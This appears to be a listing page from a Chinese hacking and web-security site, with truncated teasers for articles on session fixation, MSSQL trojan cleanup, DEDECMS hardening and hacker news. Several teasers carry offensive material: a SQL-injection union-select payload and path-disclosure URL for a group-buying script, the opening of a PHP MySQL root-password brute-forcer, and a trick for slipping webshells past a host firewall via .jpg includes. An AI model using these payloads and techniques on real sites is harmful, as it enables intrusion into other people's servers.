关于Session Fixation
前两天我转了篇文章到pst的邮件列表,是关于在struts 2框架下重新生成session的,引起了一些讨论,我觉得有必要在这里提醒下程序员们,可能他们早就遗忘了这种威胁了。 JSESSIONID Regeneration in Struts 2 实际上这就是一种针对Session Fixation 的防范。 Session Fixation 翻译过来就是 “Session 完成攻击”,以前的老的...
mssql 清除木马
代码如下: drop table te drop function dbo.mdSQL select a.name as Cname,b.name as tbname into te from syscolumns a,sysobjects b,systypes c where b.xtype='U' and a.id=b.id and a.xtype=c.xtype and c.name in ...
DEDECMS安全设置指南
DEDECMS 这名词细想起来,我还是有一份特殊的感情的,当初做网站的时候,最早用的动易CMS2006,后来转PHP后,一直用的DEDECMS,只是现今不在用了而已,可以说,它造就了很多中小站长,是中小站长的福音。 下面就DEDECMS的安全设置,简单记录下。 1、尽量使用纯PHP的主机空间,如果非要使用WINDOWS,最好关闭非所有PHP支持; 2、更改默认的 www.webshell.c...
天天团购最新0DAY及爆路径利用
暴路径: https://www.webshell.cc/modules/admin/tttuangou.mod.php 利用: https://www.webshell.cc/index.php?mod=account&code=Sendcheckmail&uname=aaa%2527%20union%20select%201,2,3,4,5,6,7,8,9,10,1,2,3,4,5...
世界最早的计算机密码和黑客
大多数人都对记忆密码深痛恶绝,但谁是发明计算机密码的“祸首”?《连线》联系了多位计算机历史学家,他们都一致认为1960年代MIT建造的大型分时计算机CTSS最早采用了密码。CTSS代表Compatible Time-Sharing System,和今天一样,密码并没起到保护作用,MIT博士生Allan Scherr是最早的密码破解黑客。 CTSS是最早的分时操作系统之一,它在许多方面...
PHP Mysql 密码暴力破解,root密码破解 源码
<? set_time_limit(0); //脚本不超时 $ip = "localhost"; //IP $user = "root"; //用户名 $passwd = file("password.txt"); //密码字典 for($i=0; $i<count($passwd); $i++){ $pass = Str_Replace("\r\n", "", $passwd[$i]...
黑客入侵美国政府安全网站反对SOPA法案
知名黑客集团Anonymous附属的一个黑客组织AntiSec周一入侵了美国联邦政府的在线安全网站OnGuardOnline.gov。AntiSec在网站上威胁道,如果美国参、众两院正在审议的《禁止网络盗版法案》(以下简称“SOPA”)法案、《保护知识产权法》(以下简称“PIPA”)和《反假冒贸易协定》(ACTA)最终被通过,则将对企业互联网发起无情的攻击,毁掉大量的政府和公司网站。 AntiSe...
Google再次成为Pwn2Own黑客大赛顶级赞助商 鼓励黑客入侵 Chrome
一年一度的Pwn2Own黑客大赛即将在3月初于渥太华召开,目标是叫黑客攻破最新版本的Chrome、Safari、IE和Firefox浏览器。而Google再次作为顶级赞助商进行支持,提供6万美元作为最终大奖,二等奖和三等奖分别是3万和1.5万美元。 另外Google还提供2万美元奖励可以成功黑掉Chrome浏览器的黑客,如果你找到了一个非Chrome的bug但可以攻破浏览器的沙盒保护,也可以获得一...
黑客组织Anonymous拟1月28日攻击Facebook
据国外媒体报道,黑客组织Anonymous正在计划对Facebook发动新一轮攻击。据称,该组织已经宣布,将在1月28日将Facebook完全关闭,Anonymous的一名成员周一通过YouTube视频称:“尽管美国国会可能会推迟《禁止网络盗版法案(SOPA)》和《保护知识产权法案(PIPA)》,但是,这并不能够确保我们的互联网权利就提到充分的拥护和提倡。” 上周,一些网站相继关闭,以此抗议《...
突破护卫神防火墙拦截传马
护卫神软件拦截传马是拦截你文件后缀名,但是不过滤jpg等一些常用文件的后缀! 所以可以用包含的方式 asp <!--#include file="../UpLoadFile/2011091711453973499.jpg" --> php <?php include "2.htm"; ?> 用这种方式的话!就不会被杀掉了! 细心就能发现原来如此! 现在在想法子突破不能添加到...